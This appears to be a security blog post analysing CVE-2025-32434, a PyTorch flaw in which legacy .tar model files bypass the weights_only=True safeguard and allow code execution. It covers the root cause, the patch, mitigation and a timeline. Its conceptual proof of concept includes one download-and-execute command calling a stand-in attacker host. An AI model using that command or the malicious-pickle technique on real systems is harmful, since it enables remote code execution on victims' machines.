CVE-2025-32434: PyTorch's 'Safe Mode' torch.load Wasn't So Safe After All
Hey folks, gather round the virtual fireplace. Today, we're diving into a fascinating vulnerability in one of the most popular machine learning frameworks out there: PyTorch. CVE-2025-32434 is a bit of a sneaky one, turning a feature designed for safety into a potential gateway for Remote Code Execution (RCE). Grab your coffee (or your preferred caffeinated beverage), and let's unpack this.
TL;DR / Executive Summary
- What's the issue? CVE-2025-32434 is a Remote Code Execution (RCE) vulnerability in PyTorch versions up to and including 2.5.1.
- How does it work? Even when using the supposedly "safe" `torch.load(..., weights_only=True)` call, specially crafted malicious model files using a legacy format can bypass security checks and execute arbitrary code.
- Affected Systems: PyTorch <= 2.5.1.
- Severity: Likely High to Critical (CVSS score pending, but RCE is generally serious business).
- Mitigation: Upgrade PyTorch to version 2.6.0 or later immediately (`pip install --upgrade "torch>=2.6.0"`, with quotes so your shell doesn't treat `>=` as a redirect).
Introduction: Trust in the Machine (Learning Model)
In the rapidly expanding universe of Artificial Intelligence and Machine Learning, frameworks like PyTorch are the bedrock upon which incredible innovations are built. Developers and data scientists rely on these tools daily, often loading pre-trained models downloaded from various sources. But what happens when the mechanism designed to safely load these models has a hidden flaw?
Enter `torch.load`. Historically, loading arbitrary files with `torch.load` (which uses Python's `pickle` module under the hood) was known to be risky. Pickle files can contain code that gets executed upon loading, making them a classic RCE vector if you load a file from an untrusted source. To combat this, PyTorch introduced the `weights_only=True` argument. The promise was simple: set this flag, and `torch.load` would only load the model's parameters (tensors and simple data types), refusing to execute any potentially harmful code embedded within. It was the recommended "safe mode."
Except, as security researcher Ji'an Zhou discovered, there was a loophole. CVE-2025-32434 demonstrates that even with `weights_only=True`, RCE is still possible under certain conditions. This matters immensely because many developers, following best practices, likely switched to `weights_only=True` believing they were protected.
Technical Deep Dive: Unraveling the Legacy Knot
So, how did this happen? Let's get technical.
The `pickle` Problem and `weights_only`:

Python's `pickle` module is powerful but dangerous for deserializing untrusted data. It allows objects to define a `__reduce__` method, which can specify arbitrary functions to be called during unpickling, including things like `os.system`. `torch.save` uses `pickle` by default.

The `weights_only=True` flag in `torch.load` was designed to mitigate this by using a restricted unpickler (`_weights_only_unpickler`). This unpickler maintains a strict allowlist of types it's permitted to deserialize, primarily tensors, storages, and the basic Python collections needed for model weights and structure. Anything else, especially code execution attempts via `__reduce__`, should be blocked.
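To make the danger concrete, here's a deliberately benign sketch of the `__reduce__` mechanism. The `Demo` class and its payload are made up for illustration; a real attacker would return something like `os.system` instead of `print`:

```python
import pickle

class Demo:
    def __reduce__(self):
        # Tells the unpickler: "to rebuild this object, call print(...)".
        # An attacker would return (os.system, ("<shell command>",)) instead.
        return (print, ("this ran during unpickling",))

blob = pickle.dumps(Demo())
pickle.loads(blob)  # Prints the message: the callable runs at load time
```

This is exactly the behavior `weights_only=True` was supposed to shut down.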
The Root Cause - Legacy Format Bypass:

The vulnerability lies in how PyTorch handles older model file formats, specifically the legacy `.tar` format. The code path responsible for loading these older formats (`_legacy_load` in `torch/serialization.py`) didn't correctly or consistently enforce the `weights_only=True` restriction.
Think of it like this: `weights_only=True` is a strict security guard posted at the main entrance (the modern zip-based format loader). This guard meticulously checks everyone's ID (the type of data being unpickled). However, CVE-2025-32434 revealed an old, rarely used service tunnel (the legacy `.tar` format loader) where the security guard wasn't properly stationed or whose instructions were incomplete. An attacker could craft a package that looked like a normal delivery but direct it through this service tunnel, bypassing the main security check and smuggling contraband (malicious code) inside.
Specifically, when `torch.load` encountered a file identified as the legacy `.tar` format, it proceeded down a code path where the `_weights_only_unpickler` wasn't correctly applied or its restrictions were circumvented, allowing the underlying (unsafe) `pickle.load` to potentially execute code embedded within the archive's components.
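In rough pseudocode, the dispatch looked something like the sketch below. This is a simplified illustration, not PyTorch's verbatim source; the helper names `_is_zipfile` and `_load` are stand-ins for the real format check and modern-format loader:

```python
# Simplified illustration of the pre-2.6.0 torch.load dispatch (not real source)
def load(f, pickle_module=pickle, weights_only=False):
    if weights_only:
        pickle_module = _weights_only_unpickler  # restricted, allowlist-based

    if _is_zipfile(f):
        # Modern zip-based format: the restricted unpickler is honored here
        return _load(f, pickle_module)

    # Legacy .tar format: pre-patch, this path could end up performing a
    # plain, unrestricted pickle load -- the weights_only promise silently broke
    return _legacy_load(f, pickle_module)
```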
Attack Vector & Business Impact:

An attacker crafts a malicious `.pt` file saved using the vulnerable legacy `.tar` format. This file contains pickled objects designed to execute code upon deserialization (e.g., using `__reduce__` to call `os.system`). The attacker then tricks a victim (a developer, an automated ML pipeline) into loading this file using `torch.load(malicious_file, weights_only=True)`.
- Attack Scenario: A user downloads a pre-trained model from a less-than-reputable source or a compromised repository. They load it using the "safe" `weights_only=True` flag, inadvertently triggering RCE.
- Impact: Full RCE on the machine running the PyTorch code. This could mean:
  - Data theft (sensitive datasets, proprietary models, credentials).
  - Server compromise and lateral movement within a network.
  - Model poisoning or manipulation.
  - Denial of Service.
Proof of Concept (Conceptual)
For ethical reasons, we won't provide a ready-to-run exploit. However, here’s the conceptual flow of how an attacker might craft a malicious file and how a victim would trigger it:
- Attacker Creates Malicious File:
  - The attacker creates a Python object whose `__reduce__` method returns a function like `os.system` and arguments (e.g., `('wget http://attacker.com/payload.sh -O /tmp/p.sh && bash /tmp/p.sh',)`).
  - This object is pickled.
  - The pickled data is embedded within a file structure conforming to PyTorch's legacy `.tar` format. This might involve creating specific files within a tarball that `_legacy_load` expects.
  - The final file is saved with a `.pt` extension (or similar) to appear like a standard PyTorch model file. Let's call it `malicious_legacy_model.pt`.
- Victim Loads the File:
  A developer or automated system runs the following Python code, believing it to be safe due to `weights_only=True`:

  ```python
  # victim_code.py
  import torch

  trusted_source = False  # Let's assume the source is untrusted

  if not trusted_source:
      print("Loading model with weights_only=True for safety...")
      try:
          # Attempting to load the malicious file using the 'safe' flag.
          # This is where CVE-2025-32434 is triggered.
          model_data = torch.load("malicious_legacy_model.pt", weights_only=True)
          print("Model loaded successfully? If you see this, the RCE may have failed or executed silently.")
          # Further processing of model_data...
      except Exception as e:
          # The RCE may occur *during* the load, before exception handling kicks in
          print(f"An error occurred: {e}")
          print("However, code execution might have already happened!")
  else:
      # A deliberately unsafe load for trusted sources (unrelated to this CVE)
      # model_data = torch.load("some_model.pt", weights_only=False)
      pass
  ```
Mitigation and Remediation: Patch Up!
Fortunately, the fix is straightforward:
- Immediate Fix: Upgrade PyTorch to version 2.6.0 or later.

  ```bash
  pip install --upgrade "torch>=2.6.0"   # quotes keep the shell from parsing >=
  # Or using conda:
  # conda update pytorch
  # (Ensure channel configuration points to versions >= 2.6.0)
  ```

  This version contains the patch that closes the loophole.
- Patch Analysis (Commit `8d4b8a920a...`):
  The core fix, visible in `torch/serialization.py` within the `_legacy_load` function, is beautifully simple. Before attempting to process the contents of the detected tar file, a new check was added:

  ```python
  # Inside _legacy_load, after opening the tarfile:
  if pickle_module is _weights_only_unpickler:
      raise RuntimeError(
          "Cannot use ``weights_only=True`` with files saved in the "
          "legacy .tar format. " + UNSAFE_MESSAGE
      )
  ```

  - What it does: It explicitly checks whether the unpickler in use is the restricted `_weights_only_unpickler` (which is the case when `weights_only=True` is passed to `torch.load`).
  - Why it works: If someone tries to load a legacy `.tar` format file with `weights_only=True`, this code now raises a `RuntimeError` immediately, before execution can ever reach the unsafe `pickle.load` calls further down the legacy path. It effectively slams the door on that old service tunnel when the "high security" mode is active. The added test case in `test/test_serialization.py` confirms this behavior; you can also observe it from user code, as in the sketch below.
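  On a patched install, the failure mode is loud and immediate. A quick sketch (the file name `legacy_model.pt` is hypothetical, standing in for any model saved in the old `.tar` format):

  ```python
  import torch

  try:
      # With PyTorch >= 2.6.0, this refuses to proceed instead of unpickling
      torch.load("legacy_model.pt", weights_only=True)
  except RuntimeError as e:
      print(f"Refused as expected: {e}")
  ```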
- Long-Term Solutions & Best Practices:
  - Verify Model Sources: Only load models from trusted, verified sources. Implement checksum verification if possible (see the sketch after this list).
  - Input Scanning: If feasible, use tools to scan model files for suspicious patterns before loading (though this is complex).
  - Principle of Least Privilege: Run ML training/inference processes in sandboxed environments (containers, VMs) with minimal permissions.
  - Dependency Management: Keep your ML frameworks and libraries up-to-date. Use tools like `pip-audit` or GitHub Dependabot.
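  A minimal checksum-verification sketch, assuming the model publisher ships a known-good SHA-256 digest alongside the file (the file name and digest below are hypothetical):

  ```python
  import hashlib

  EXPECTED_SHA256 = "0123abcd..."  # hypothetical published digest

  def sha256_of(path: str) -> str:
      h = hashlib.sha256()
      with open(path, "rb") as f:
          for chunk in iter(lambda: f.read(8192), b""):
              h.update(chunk)
      return h.hexdigest()

  if sha256_of("model.pt") != EXPECTED_SHA256:
      raise RuntimeError("Checksum mismatch: refusing to load model.pt")
  ```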
- Verification: Check your installed PyTorch version:

  ```bash
  python -c "import torch; print(torch.__version__)"
  ```

  Ensure the output is `2.6.0` or higher.
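If you'd rather enforce that check in code than by eyeball, a small runtime guard works too. A sketch, assuming the `packaging` library is installed:

```python
import torch
from packaging.version import Version  # pip install packaging

if Version(torch.__version__) < Version("2.6.0"):
    raise RuntimeError(
        f"PyTorch {torch.__version__} is affected by CVE-2025-32434; "
        "upgrade to >= 2.6.0 before loading untrusted models."
    )
```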
Timeline
- Discovery: Credited to Ji'an Zhou, likely occurred sometime before April 2025.
- Vendor Notification: Assumed to be shortly after discovery.
- Patch Development & Commit: The relevant fix (`8d4b8a9...`) was merged leading up to the 2.6.0 release.
- Patch Availability: PyTorch version 2.6.0 released, containing the fix.
- Public Disclosure (GHSA-53q9-r3pm-6pq6): April 17-18, 2025.
Lessons Learned: No Silver Bullets
This CVE serves as a great reminder of several key security principles:
- Security Features Aren't Magic: Flags like `weights_only=True` are powerful tools, but they are implemented in code, which can have bugs or unforeseen interactions, especially with legacy components. Understand how a security feature works, not just that it exists.
- Legacy Code is a Risk: Old code paths and formats, even if rarely used, can harbor vulnerabilities. Thorough auditing or planned deprecation is essential.
- Trust but Verify (Especially Downloads): The ML world thrives on sharing models, but this introduces supply chain risks. Treat downloaded model files with the same caution you would treat executable code.
Key Takeaway: Security is a continuous process, not a one-time checkbox. Even seemingly "safe" operations need scrutiny, especially when dealing with complex frameworks and external data.
References and Further Reading
- GitHub Advisory (GHSA-53q9-r3pm-6pq6): https://github.com/advisories/GHSA-53q9-r3pm-6pq6
- PyTorch Security Documentation: https://github.com/pytorch/pytorch/security
- PyTorch `torch.load` Documentation: https://pytorch.org/docs/stable/generated/torch.load.html
- Relevant Patch Commit: https://github.com/pytorch/pytorch/commit/8d4b8a920a2172523deb95bf20e8e52d50649c04
Stay safe out there, keep your dependencies updated, and question your assumptions! What other "safe" mechanisms might have hidden edge cases? Food for thought. Until next time, happy (and secure) coding!